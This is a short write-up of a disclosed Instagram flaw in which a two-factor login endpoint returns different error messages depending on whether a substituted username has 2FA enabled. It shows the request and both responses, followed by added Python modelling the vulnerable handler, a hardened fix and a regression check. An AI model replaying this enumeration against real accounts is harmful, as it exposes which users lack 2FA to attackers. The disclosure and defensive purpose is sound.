Enumerating IG accounts that have 2FA protection

The article How I was able to enumerate Instagram Accounts who had enabled 2FA for additional protection describes a flaw in IG's business logic that lets an attacker enumerate every IG user and learn whether that user has 2FA turned on.

Affected URL:

POST /accounts/login/ajax/two_factor/ HTTP/1.1
Host: www.instagram.com
[REDACTED]

username=[our-username]&verificationCode=xxxxxx&identifier=Iid0Z1fbMc

Replace the username and submit a random OTP.

If the account has 2FA enabled, the response is:

HTTP/1.1 400 Bad Request

{"message": "Please check the security code we sent you and try again.", "status": "fail"}

If the account does not have 2FA, the response is:

HTTP/1.1 400 Bad Request

{"message": "Sorry, there was a problem with your request.", "status": "fail"}
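The following is an added example, not code from the original write-up or from Instagram: a minimal model of the two_factor handler that reproduces the message oracle above, a hardened version that binds the challenge identifier to the username that started the login, and a regression check a defender can keep in a test suite. All accounts, identifiers and the hypothetical CHALLENGES store are constructed sample data.

```python
import hmac

# Constructed accounts: username -> whether 2FA is enabled.
ACCOUNTS = {
    "alice": {"two_factor": True},
    "bob": {"two_factor": False},
    "mallory": {"two_factor": True},
}
# Constructed challenge store (hypothetical): identifier issued at the password
# step -> username that owns it. The attacker's own login produced "Iid0Z1fbMc".
CHALLENGES = {"Iid0Z1fbMc": "mallory"}
# Constructed valid OTP for the legitimate session owner.
VALID_CODES = {"mallory": "123456"}

# The two distinct messages quoted in the write-up.
MSG_BAD_CODE = "Please check the security code we sent you and try again."
MSG_GENERIC = "Sorry, there was a problem with your request."


def vulnerable_two_factor(username, code, identifier):
    """Flawed logic: branches on the *target* account's 2FA state before
    checking that the identifier belongs to that account. The code and
    identifier are never consulted, so any username can be probed."""
    acct = ACCOUNTS.get(username)
    if acct is None or not acct["two_factor"]:
        return 400, {"message": MSG_GENERIC, "status": "fail"}
    # A 2FA-enabled target yields a different error body: this is the leak.
    return 400, {"message": MSG_BAD_CODE, "status": "fail"}


def hardened_two_factor(username, code, identifier):
    """Hardened: the identifier must be bound to the username that started
    the login, so a substituted username fails exactly like a non-2FA account."""
    owner = CHALLENGES.get(identifier)
    if owner is None or not hmac.compare_digest(owner, username):
        return 400, {"message": MSG_GENERIC, "status": "fail"}
    # Only the legitimate challenge owner reaches code verification.
    if not hmac.compare_digest(VALID_CODES.get(username, ""), code):
        return 400, {"message": MSG_BAD_CODE, "status": "fail"}
    return 200, {"status": "ok"}


def response_leaks_2fa_state(handler):
    """Regression check: True if a client holding only its own identifier
    gets different responses for a 2FA account and a non-2FA account."""
    attacker_id = "Iid0Z1fbMc"
    with_2fa = handler("alice", "000000", attacker_id)
    without_2fa = handler("bob", "000000", attacker_id)
    return with_2fa != without_2fa
```

The check passes for the vulnerable handler (responses differ) and fails for the hardened one, while the real challenge owner still sees the code-specific error for their own session.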

Ref

[Facebook Bug Bounty] How I was able to enumerate Instagram Accounts who had enabled 2FA (Two Step…
